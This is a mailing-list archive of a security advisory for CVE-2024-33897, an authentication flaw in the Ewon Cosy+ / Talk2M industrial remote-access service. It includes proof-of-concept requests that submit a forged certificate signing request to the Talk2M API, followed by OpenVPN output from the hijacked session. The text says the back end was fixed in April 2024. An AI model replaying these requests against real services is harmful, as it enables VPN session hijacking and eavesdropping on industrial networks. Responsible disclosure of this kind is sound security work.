Full Disclosure mailing list archives

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2024-043
Product:                   Ewon Cosy+ / Talk2M Remote Access Solution
Manufacturer:              HMS Industrial Networks AB
Affected Version(s):       N.A.
Tested Version(s):         N.A.
Vulnerability Type:        Improper Authentication (CWE-287)
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2024-04-17
Solution Date:             2024-04-18
Public Disclosure:         2024-08-11
CVE Reference:             CVE-2024-33897
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between
the machine (PLC, HMI, or other devices) and the remote engineer.
The connection happens through Talk2m, a highly secured industrial
cloud service. The Ewon Cosy+ makes industrial remote access easy
and secure like never before!"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

During account assignment in the Talk2M platform, a Cosy+ device
generates and sends a certificate signing request (CSR) to the back end.
This CSR is then signed by the manufacturer and used for OpenVPN
authentication by the device afterward.

Since the common name (CN) of the certificate is specified by the device
and used in order to assign the OpenVPN session to the corresponding
Talk2M account, an attacker with root access to a Cosy+ device is able
to manipulate the CSR and get correctly signed certificates for foreign
devices.

Using these certificates for OpenVPN authentication results in hijacking
the VPN session and allows for further attacks, e.g.:

- - Impacting the accessibility of the original device
- - Attacking the Talk2M-connected user device via the VPN connection
- - Eavesdropping and manipulating the network communication of connected
  users

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Note: Since the X.509 client certificate of a Cosy+, which is used for
      authentication against the Talk2M API, is handled by the hardware
      security module (HSM), root access to a Cosy+ device is required.


1. Exporting the OpenSSL engine to use the hardware security module:

   $ export EX_SSS_BOOT_SSS_PORT=/dev/i2c-0


2. Sending a self-created CSR to the Talk2M API:

    -H $'Host: eu.device.talk2m.com' -H $'Accept: application/json' \
    -H $'Content-Type: application/json' -H $'Ewon-Serial: 2403-0999-25' \
    -H $'Device-State: AccountLinked' -H $'Content-Length: 768' \
    --data-binary $'{\x0a\x09\"csr\":
        \x09\"-----BEGIN CERTIFICATE REQUEST-----\\nMIIB6zCCAUwCAQAwgaY
        xCzAJBgNVBAYTAkJFMRcwFQYDVQQIEw5CcmFiYW50IFdh\\nbGxvbjERMA8GA1U
        EBxMITml2ZWxsZXMxIzAhBgNVBAoTGkhNUyBJbmR1c3RyaWFs\\nIE5ldHdvcmt
        zIFNBMRAwDgYDVQQLEwdFd29uIEJVMRYwFAYDVQQDEw1EMjMwNy0w\\nMTAxLTI
        1MRwwGgYJKoZIhvcNAQkBFg1pbmZvQGV3b24uYml6MIGbMBAGByqGSM49\\nAgE
        GBSuBBAAjA4GGAAQBaUGPo1FIjOOqyd1M47M2fcLQ2MN3aj7wI8pBYmopdSEY\\
        nKszktBPre3AZ74E4326+vUej6nBG/17SWNb+VZPEyXYBAvEyyvsXfy/UlnB6NX
        aj\\n6rrmy2pqP5bKN/1yR3reqlA6+9rdYzcH3ESJvp9hTkZnV4qbdNjTtqSfZO
        4zu1Zn\\nE+CgADAKBggqhkjOPQQDAgOBjAAwgYgCQgDVbJN5MJJZnkRRvNwwXu
        6GrvILBN6H\\nxTwR3inwMxLf+a/o+SFiqq5Pvsm2UXebVSD3osopdnJ8cxzTzi
        PopsLiXAJCAa5K\\n+0T0H8VAvBzKTQkpiHHzW9JkDvIDaJA4WtYzA+KT7jo4kW
        vQIr7rBBOlILoofQzv\\nypCqHaugjHhdeuJecIiq\\n-----END CERTIFICAT
        E REQUEST-----\\n\"\x0a}' \
    $'https://eu.device.talk2m.com/certificates/csr' \
    --cert /tmp/birth_key_crt.pem --key /tmp/birth_key_ref.pem


3. Requesting the signed certificate:

    https://device.talk2m.com/certificates/deviceCertificate  \
    --cert birth_key_crt.pem --key birth_key_ref.pem


4. Talk2M response:

    date: Tue, 16 Apr 2024 13:09:57 GMT
    server: Apache
    ewon-server-time: 1713272998
    device-state: VpnProvisioned
    content-type: application/json
    transfer-encoding: chunked

    KsxyR8w==\n-----END CERTIFICATE-----"}


5. This signed certificate and the used key can be used for OpenVPN
   authentication. The CN will be used to assign the session to the
   corresponding Talk2M account. This also overwrites a potential
   current VPN session of the original device:

    $ openvpn --config attacker.ovpn
      Attempting to establish TCP connection with [AF_INET]51.195.79.69:443
      TCP connection established with [AF_INET]51.195.79.69:443
      TCPv4_CLIENT link remote: [AF_INET]51.195.79.69:443
      VERIFY OK: depth=1, C=BE, ST=Brabant Wallon, L=Nivelles, O=eWON sa,
        OU=Talk2M, CN=Talk2M Certification Authority,
        emailAddress=itmanager () talk2m com
      VERIFY KU OK
      Validating certificate extended key usage
      ++ Certificate has EKU (str) TLS Web Server Authentication,
        expects TLS Web Server Authentication
      VERIFY EKU OK
      VERIFY OK: depth=0, C=BE, ST=Brabant Wallon, L=Nivelles,
        O=HMS Industrial Networks SA, OU=Talk2M, CN=server-device,
        emailAddress=info () ewon biz
      Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384,
        peer certificate: 2048 bit RSA, signature: RSA-SHA1
      [server-device] Peer Connection Initiated with [AF_INET]51.195.79.69:443
      TUN/TAP device tap0 opened
      net_addr_ll_set: lladdr 00:03:27:d8:68:84 for tap0
      TUN/TAP link layer address set to 00:03:27:d8:68:84
      net_iface_mtu_set: mtu 1500 for tap0
      net_iface_up: set tap0 up
      net_addr_v4_add: 10.37.211.214/16 dev tap0
      Data Channel: cipher 'AES-256-GCM', peer-id: 0, compression: 'lzo'
      Timers: ping 10, ping-exit 40
      Initialization Sequence Completed

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vulnerability was fixed in the back end by HMS on April 18, 2024.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-09: Potential vulnerability discovered
2024-04-16: Call with the manufacturer and requested a Talk2M account
            with an assigned device to verify the potential vulnerability
2024-04-16: Manufacturer provided a Talk2M account with an assigned device
2024-04-16: Vulnerability confirmed
2024-04-16: Short update about the state sent to the manufacturer
2024-04-16: Security advisory inculding technical details provided to
            the manufacturer
2024-04-18: Vulnerability fixed by the manufacturer
2024-04-30: CVE ID CVE-2024-33897[5] assigned by the manufacturer
2024-07-12: Manufacturer asked for reviewing the blog post draft
2024-07-12: Confirmed reviewing the blog post is possible and asking for
            the sending of details
2024-07-17: Blog post provided to HMS
2024-07-23: Inquiry about the status
2024-07-23: Manufacturer reviewed the blog post
2024-07-24: Manufacturer also asked for an appointment to discuss the blog post
2024-07-29: Discussion with HMS about the blog post and final publication
            actions
2024-08-11: Vulnerability disclosed at DEF CON[7]
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website
    https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet
[2] SySS Security Advisory SYSS-2024-043
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-043.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] Manufacturer note
    
https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf
[5] CVE-2024-33897
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33897
[6] Blog post
    https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/
[7] DEF CON talk
    https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell () syss de
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL:http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay47wACgkQrgyb+PE0
i1O5RQ/9HM9YIPRLVqGSRNPYW45F9e1wj9uHTvt78XjRng5lbRPpgWAO1G6UVQvS
ebugxzjAtGrdMxx8X1NHd9vbshyAHj/q33Y0fkQ5TB2hnSMkn2nbXTEZKIIS6wK0
XnJhB31iVnkgMeNFQ0SwSutBnnxJ7mvQ6vUBG210DSHjpQtu8rWuCyrf3BcSCJ/I
nT79b7TJOxOMD1y5VAeVP6Pehh+IlJgvSItXZyOjs4wgt/+z+wVoKnYdqSAHpovI
/rjVbtp7cvIhQInghnDoRWfXce34bk07geOB4VGg7bhxGCeWbJZq/Dxrag5jJb9l
0zx2K4M8ZTwFcrtAliFgyzrIgvjfOk9HCZasSMl20znj4+3QaAWpfn2oMmCQCaLg
6hBqAQ+s66Cv8Br24WKdlnj3nrsn+SAX2TKDxajt+WiDkXKvsLPs8XCmzVN8jViK
nN/dJ3chba4yhqmpft1wRXG71VvBdbv3pkLp7usKszUrul8M802JzF2aGTUsiKgQ
QSxpNhSP4aC2jqjt1OpX7W6NKD1nIhg0VrduxlwlAcQ2uffbh8xtak1MgZry0/yP
6j9a15DOTJshMeud8R3Bkfjms/0Jzm43uyjIeRGNP79UyohsTX4jOJAsUYr0efUZ
/55N3HiCD94jYoee5E3sF1vWlrhVDzkWJ7Q8u/W4osSIwMNikTc=
=JS3w
-----END PGP SIGNATURE-----

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• Improper Authentication (CWE-287) CVE-2024-33897 Moritz Abrell via Fulldisclosure (Aug 17)